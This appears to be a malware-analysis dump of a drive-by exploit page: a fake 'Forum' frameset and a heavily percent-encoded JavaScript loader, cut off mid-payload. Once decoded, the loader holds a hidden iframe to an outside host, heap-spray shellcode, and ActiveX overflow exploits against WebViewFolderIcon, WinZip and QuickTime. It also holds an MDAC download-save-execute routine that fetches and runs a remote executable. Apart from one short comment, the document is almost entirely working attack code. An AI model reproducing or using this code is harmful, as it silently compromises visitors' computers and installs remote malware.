.0x01:[WBICM]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> 
<html> 
<head> 
<title>Forum</title> 
<meta name="keywords" content="[...]"> 
<meta name="description" content="[...]"> 
<meta name="revisit-after" content="10 days"> 
<meta name="robots" content="INDEX, FOLLOW"> 
</head> 
<frameset rows="15,*" frameborder="NO" border="0" framespacing="0"> 
<frame name="ad" src="/frame.html" noresize scrolling="no"> 
<frame name="main" src="http://website.com/forum//wbicm.js"> 						// notice the url there, strange isn't it ?
</frameset> 
<noframes> 
<body bgcolor="#FFFFFF" text="#000000">    
<script language='JavaScript' type='text/javascript' src='bskrf.js'></script> 
<a href="http://website.com/forum//wbicm.js">Click here to continue to Forum</a> 
</body> 
</noframes> 
</html> 

[WBICM]



.0x02:[BSKRF]

var arg="vxnhnuse"; 

var MU = "http://" + window.location.hostname + "/" + arg; 
var MH = ''; 
for (i=0; i < MU.length; i++) 
{ 
        var b = MU.charCodeAt (i); 
   MH = MH + b.toString (16); 
} 
MH = MH.toUpperCase(); 
if (Math.round(MU.length/2) != (MU.length/2)) 
{ 
   MH += '00'; 
} 

var MR = ''; 
for (i=0; i < MH.length; i += 4) 
{ 
   MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2); 
} 

var MU2 = "\"" + MU + "\""; 
var MR2 = "\"" + MR + "\""; 

var SB = 
unescape ('%0a%3c%68%74%6d%6c%3e%0a%3c%62%6f%64%79%3e%0a%3c%64%69%76%20%69%64%3d%22%6d%79%64%69%76%22%3e%3c%2f%64%69%76%3e%0a%3c%69%66%72%61%6d%65%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%27%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%64%73%2e%69%6e%76%69%74%61%74%69%6f%6e%73%2e%66%72%2f%73%73%70%2f%27%3e%3c%2f%69%66%72%61%6d%65%3e%0a%0a%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%0a%76%61%72%20%6d%65%6d%6f%72%79%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0a%76%61%72%20%6d%65%6d%5f%66%6c%61%67%20%3d%20%30%3b%0a%0a%66%75%6e%63%74%69%6f%6e%20%68%61%76%69%6e%67%28%29%20%7b%20%6d%65%6d%6f%72%79%3d%6d%65%6d%6f%72%79%3b%20%73%65%74%54%69%6d%65%6f%75%74%28%22%68%61%76%69%6e%67%28%29%22%2c%20%32%30%30%30%29%3b%20%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%67%65%74%53%70%72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64%65%2c%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%7b%0a%09%77%68%69%6c%65%20%28%73%70%72%61%79%53%6c%69%64%65%2e%6c%65%6e%67%74%68%2a%32%3c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%09%7b%73%70%72%61%79%53%6c%69%64%65%20%2b%3d%20%73%70%72%61%79%53%6c%69%64%65%3b%7d%0a%0a%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%73%70%72%61%79%53%6c%69%64%65%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%2f%32%29%3b%0a%09%72%65%74%75%72%6e%20%73%70%72%61%79%53%6c%69%64%65%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%6d%61%6b%65%53%6c%69%64%65%28%29%0a%7b%0a%09%76%61%72%20%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72%65%73%73%20%3d%20%30%78%30%63%30%63%30%63%30%63%3b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%43%6f%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%25%75%30%66%65%62%25%75%33%33%35%62%25%75%36%36%63%39%25%75%38%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%22%20%2b%0a%22%25%75%65%32%34%33%25%75%65%62%66%61%25%75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%66%25%75%38%62%37%66%25%75%64%66%34%65%25%75%65%66%65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39%66%36%34%25%75%34%32%66%33%25%75%39%66%36%34%25%75%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62%22%20%2b%0a%22%25%75%36%34%65%66%25%75%62%39%30%33%25%75%36%31%38%37%25%75%65%31%61%31%25%75%30%37%30%33%25%75%65%66%31%31%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%38%37%25%75%36%35%31%31%25%75%30%37%65%31%25%75%65%66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%37%22%20%2b%0a%22%25%75%63%61%38%37%25%75%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%37%38%66%25%75%65%66%33%62%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25%75%30%61%39%36%22%20%2b%0a%22%25%75%30%37%35%37%25%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36%36%25%75%61%66%66%62%25%75%64%37%36%66%25%75%39%61%32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%65%38%30%36%25%75%65%66%65%65%25%75%62%31%65%66%25%75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61%25%75%65%65%38%35%22%20%2b%0a%22%25%75%36%34%62%36%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66%36%34%25%75%65%66%65%66%25%75%38%37%62%66%25%75%66%35%64%39%25%75%39%66%63%30%25%75%37%38%30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66%33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%75%36%36%62%66%25%75%63%66%61%61%22%20%2b%0a%22%25%75%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66%25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%65%64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75%32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%25%75%32%38%38%61%25%75%65%62%61%66%22%20%2b%0a%22%25%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%62%25%75%62%63%33%34%25%75%31%30%62%63%22%20%2b%0a%22%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61%36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25%75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%37%61%61%25%75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61%22%20%2b%0a%22%25%75%66%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%36%34%31%30%25%75%66%66%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%75%61%65%65%66%25%75%62%64%62%34%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%22%20%2b%0a%22%25%75%30%33%36%63%25%75%62%35%65%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62%64%31%38%25%75%30%66%31%30%25%75%36%34%62%61%25%75%36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%25%75%62%39%65%33%25%75%39%63%36%34%25%75%36%34%64%33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39%31%63%22%20%2b%0a%22%25%75%39%39%36%34%25%75%65%63%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75%34%32%61%65%25%75%32%63%65%63%25%75%64%63%62%39%25%75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%35%25%75%65%37%39%62%25%75%32%31%32%65%25%75%65%63%65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31%31%64%34%22%20%2b%0a%22%25%75%39%61%62%31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35%36%34%25%75%65%63%63%62%25%75%38%39%33%32%25%75%65%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25%75%33%32%65%63%25%75%65%62%36%34%25%75%65%63%36%34%25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%65%37%25%75%31%62%30%37%22%20%2b%0a%22%25%75%31%30%31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61%30%61%32%25%75%65%66%61%31%22%20%2b%20%20%20%20') + 
MR2 +
unescape ('%29%3b%0a%09%76%61%72%20%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%3d%20%30%78%34%30%30%30%30%30%3b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%53%69%7a%65%20%3d%20%70%61%79%4c%6f%61%64%43%6f%64%65%2e%6c%65%6e%67%74%68%20%2a%20%32%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%20%3d%20%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%2d%20%28%70%61%79%4c%6f%61%64%53%69%7a%65%2b%30%78%33%38%29%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30%63%30%63%25%75%30%63%30%63%22%29%3b%0a%0a%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%67%65%74%53%70%72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64%65%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%3b%0a%09%68%65%61%70%42%6c%6f%63%6b%73%20%3d%20%28%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72%65%73%73%20%2d%20%30%78%34%30%30%30%30%30%29%2f%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%3b%0a%09%0a%09%66%6f%72%20%28%69%3d%30%3b%69%3c%68%65%61%70%42%6c%6f%63%6b%73%3b%69%2b%2b%29%0a%09%7b%0a%09%09%6d%65%6d%6f%72%79%5b%69%5d%20%3d%20%73%70%72%61%79%53%6c%69%64%65%20%2b%20%70%61%79%4c%6f%61%64%43%6f%64%65%3b%0a%09%7d%0a%0a%09%6d%65%6d%5f%66%6c%61%67%20%3d%20%31%3b%0a%09%68%61%76%69%6e%67%28%29%3b%0a%09%72%65%74%75%72%6e%20%6d%65%6d%6f%72%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%57%56%46%28%29%0a%7b%0a%09%66%6f%72%20%28%69%3d%30%3b%69%3c%31%32%38%3b%69%2b%2b%29%0a%09%7b%0a%09%09%74%72%79%7b%20%0a%09%09%09%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0a%09%09%09%74%61%72%2e%73%65%74%53%6c%69%63%65%28%30%78%37%66%66%66%66%66%66%65%2c%20%30%78%30%63%30%63%30%63%30%63%2c%20%30%78%30%63%30%63%30%63%30%63%2c%30%78%30%63%30%63%30%63%30%63%20%29%3b%20%0a%09%09%7d%63%61%74%63%68%28%65%29%7b%7d%0a%09%7d%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%57%69%6e%5a%69%70%28%6f%62%6a%65%63%74%29%0a%7b%0a%09%76%61%72%20%78%68%20%3d%20%27%41%27%3b%0a%09%77%68%69%6c%65%20%28%78%68%2e%6c%65%6e%67%74%68%20%3c%20%32%33%31%29%20%78%68%2b%3d%27%41%27%3b%0a%09%78%68%2b%3d%22%5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%22%3b%0a%09%6f%62%6a%65%63%74%2e%43%72%65%61%74%65%4e%65%77%46%6f%6c%64%65%72%46%72%6f%6d%4e%61%6d%65%28%78%68%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%6e%75%6d%29%0a%7b%0a%09%69%66%20%28%6e%75%6d%20%3d%3d%20%30%29%20%7b%0a%09%09%74%72%79%20%7b%0a%09%09%09%76%61%72%20%71%74%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%51%75%69%63%6b%54%69%6d%65%2e%51%75%69%63%6b%54%69%6d%65%27%29%3b%09%09%0a%09%09%09%69%66%20%28%71%74%29%20%7b%0a%09%09%09%09%76%61%72%20%71%74%68%74%6d%6c%20%3d%20%27%3c%6f%62%6a%65%63%74%20%43%4c%41%53%53%49%44%3d%22%63%6c%73%69%64%3a%30%32%42%46%32%35%44%35%2d%38%43%31%37%2d%34%42%32%33%2d%42%43%38%30%2d%44%33%34%38%38%41%42%44%44%43%36%42%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%30%70%78%22%3e%27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63%22%20%76%61%6c%75%65%3d%22%68%74%74%70%3a%2f%2f%61%6c%2d%77%69%6c%6c%69%61%6d%73%2e%63%6f%6d%2f%74%58%6c%77%70%4b%44%4c%2f%75%43%66%49%58%72%55%63%56%70%79%63%4d%6b%56%6a%2e%71%74%6c%22%3e%27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%61%75%74%6f%70%6c%61%79%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%6c%6f%6f%70%22%20%76%61%6c%75%65%3d%22%66%61%6c%73%65%22%3e%27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%63%6f%6e%74%72%6f%6c%6c%65%72%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0a%09%09%09%09%27%3c%2f%6f%62%6a%65%63%74%3e%27%3b%0a%09%09%09%09%69%66%20%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28%29%3b%0a%09%09%09%09%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%6d%79%64%69%76%27%29%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%71%74%68%74%6d%6c%3b%0a%09%09%09%09%6e%75%6d%20%3d%20%32%35%35%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a%09%09%69%66%20%28%6e%75%6d%20%3d%20%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%31%29%22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%31%29%3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20%31%29%20%7b%0a%09%09%74%72%79%20%7b%0a%09%09%09%76%61%72%20%77%69%6e%7a%69%70%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0a%09%09%09%77%69%6e%7a%69%70%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73%69%64%3a%41%30%39%41%45%36%38%46%2d%42%31%34%44%2d%34%33%45%44%2d%42%37%31%33%2d%42%41%34%31%33%46%30%33%34%39%30%34%22%29%3b%0a%0a%09%09%09%76%61%72%20%72%65%74%3d%77%69%6e%7a%69%70%2e%43%72%65%61%74%65%4e%65%77%46%6f%6c%64%65%72%46%72%6f%6d%4e%61%6d%65%28%75%6e%65%73%63%61%70%65%28%22%25%30%30%22%29%29%3b%0a%09%09%09%69%66%20%28%72%65%74%20%3d%3d%20%66%61%6c%73%65%29%20%7b%0a%09%09%09%09%69%66%20%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28%29%3b%0a%09%09%09%09%73%74%61%72%74%57%69%6e%5a%69%70%28%77%69%6e%7a%69%70%29%3b%0a%09%09%09%09%6e%75%6d%20%3d%20%32%35%35%3b%0a%09%09%09%7d%0a%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a%09%09%69%66%20%28%6e%75%6d%20%3d%20%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%32%29%22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%32%29%3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20%32%29%20%7b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0a%09%09%09%69%66%20%28%74%61%72%29%20%7b%0a%09%09%09%09%69%66%20%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28%29%3b%0a%09%09%09%09%73%74%61%72%74%57%56%46%28%29%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%0a%7d%0a%0a%0a%66%75%6e%63%74%69%6f%6e%20%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%6c%65%6e%29%0a%7b%0a%09%76%61%72%20%63%68%61%72%73%20%3d%20%22%61%62%63%64%65%66%67%68%69%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%22%3b%0a%09%76%61%72%20%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%20%3d%20%6c%65%6e%3b%0a%09%76%61%72%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%3d%20%27%27%3b%0a%09%66%6f%72%20%28%76%61%72%20%69%3d%30%3b%20%69%3c%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%76%61%72%20%72%6e%75%6d%20%3d%20%4d%61%74%68%2e%66%6c%6f%6f%72%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%20%2a%20%63%68%61%72%73%2e%6c%65%6e%67%74%68%29%3b%0a%09%09%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%2b%3d%20%63%68%61%72%73%2e%73%75%62%73%74%72%69%6e%67%28%72%6e%75%6d%2c%72%6e%75%6d%2b%31%29%3b%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%43%4c%53%49%44%2c%20%6e%61%6d%65%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b%0a%09%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%09%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%22%22%2c%20%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%72%65%74%75%72%6e%28%72%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64%28%78%6d%6c%2c%20%75%72%6c%29%20%7b%0a%0a%09%74%72%79%20%7b%0a%09%09%78%6d%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%20%75%72%6c%2c%20%66%61%6c%73%65%29%3b%0a%09%09%78%6d%6c%2e%73%65%6e%64%28%6e%75%6c%6c%29%3b%0a%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%78%6d%6c%2e%72%65%73%70%6f%6e%73%65%42%6f%64%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%6f%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20%7b%0a%0a%09%74%72%79%20%7b%0a%09%09%6f%2e%54%79%70%65%20%3d%20%31%3b%0a%09%09%6f%2e%4d%6f%64%65%20%3d%20%33%3b%0a%09%09%6f%2e%4f%70%65%6e%28%29%3b%0a%09%09%6f%2e%57%72%69%74%65%28%64%61%74%61%29%3b%0a%09%09%6f%2e%53%61%76%65%54%6f%46%69%6c%65%28%6e%61%6d%65%2c%20%32%29%3b%0a%09%09%6f%2e%43%6c%6f%73%65%28%29%3b%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%31%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%53%68%65%6c%6c%45%78%65%63%75%74%65%28%65%78%65%63%2c%20%6e%61%6d%65%2c%20%74%79%70%65%29%20%7b%0a%0a%09%69%66%20%28%74%79%70%65%20%3d%3d%20%30%29%20%7b%0a%09%09%74%72%79%20%7b%20%65%78%65%63%2e%52%75%6e%28%6e%61%6d%65%2c%20%30%29%3b%20%72%65%74%75%72%6e%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%20%65%6c%73%65%20%7b%0a%09%09%74%72%79%20%7b%20%65%78%65%2e%53%68%65%6c%6c%45%78%65%63%75%74%65%28%6e%61%6d%65%29%3b%20%72%65%74%75%72%6e%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%28%30%29%3b%0a%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%4d%44%41%43%28%29%20%7b%0a%09%76%61%72%20%74%20%3d%20%6e%65%77%20%41%72%72%61%79%28%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%30%7d%27%2c%20%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36%7d%27%2c%20%27%7b%41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%33%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%41%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%36%65%33%32%30%37%30%61%2d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64%63%31%66%61%39%31%64%32%66%63%33%7d%27%2c%20%27%7b%36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%31%44%2d%41%30%44%38%2d%46%43%46%44%46%33%33%45%38%33%33%43%7d%27%2c%20%27%7b%37%46%35%42%37%46%36%33%2d%46%30%36%46%2d%34%33%33%31%2d%38%41%32%36%2d%33%33%39%45%30%33%43%30%41%45%33%44%7d%27%2c%20%27%7b%30%36%37%32%33%45%30%39%2d%46%34%43%32%2d%34%33%63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%30%37%36%36%7d%27%2c%20%27%7b%36%33%39%46%37%32%35%46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d%38%37%34%38%34%37%36%38%32%30%31%30%7d%27%2c%20%27%7b%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34%34%66%39%2d%38%33%42%34%2d%34%36%31%34%35%34%43%38%34%42%46%38%7d%27%2c%20%27%7b%44%30%43%30%37%44%35%36%2d%37%43%36%39%2d%34%33%46%31%2d%42%34%41%30%2d%32%35%46%35%41%31%31%46%41%42%31%39%7d%27%2c%20%27%7b%45%38%43%43%43%44%44%46%2d%43%41%32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37%43%39%36%32%34%37%36%42%7d%27%2c%20%6e%75%6c%6c%29%3b%0a%09%76%61%72%20%76%20%3d%20%6e%65%77%20%41%72%72%61%79%28%6e%75%6c%6c%2c%20%6e%75%6c%6c%2c%20%6e%75%6c%6c%29%3b%0a%09%76%61%72%20%69%20%3d%20%30%3b%0a%09%76%61%72%20%6e%20%3d%20%30%3b%0a%09%76%61%72%20%72%65%74%20%3d%20%30%3b%0a%09%76%61%72%20%75%72%6c%52%65%61%6c%45%78%65%20%3d%20%20%20') +
MU2 +
unescape ('%3b%0a%0a%09%77%68%69%6c%65%20%28%74%5b%69%5d%20%26%26%20%28%21%20%76%5b%30%5d%20%7c%7c%20%21%20%76%5b%31%5d%20%7c%7c%20%21%20%76%5b%32%5d%29%20%29%20%7b%0a%09%09%76%61%72%20%61%20%3d%20%6e%75%6c%6c%3b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0a%09%09%09%61%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73%69%64%3a%22%20%2b%20%74%5b%69%5d%2e%73%75%62%73%74%72%69%6e%67%28%31%2c%20%74%5b%69%5d%2e%6c%65%6e%67%74%68%20%2d%20%31%29%29%3b%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%61%20%3d%20%6e%75%6c%6c%3b%20%7d%0a%09%09%0a%09%09%69%66%20%28%61%29%20%7b%0a%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%7b%0a%09%09%09%09%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%6d%73%78%6d%6c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%4d%69%63%72%6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%72%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%7d%0a%0a%09%09%09%69%66%20%28%21%20%76%5b%31%5d%29%20%7b%0a%09%09%09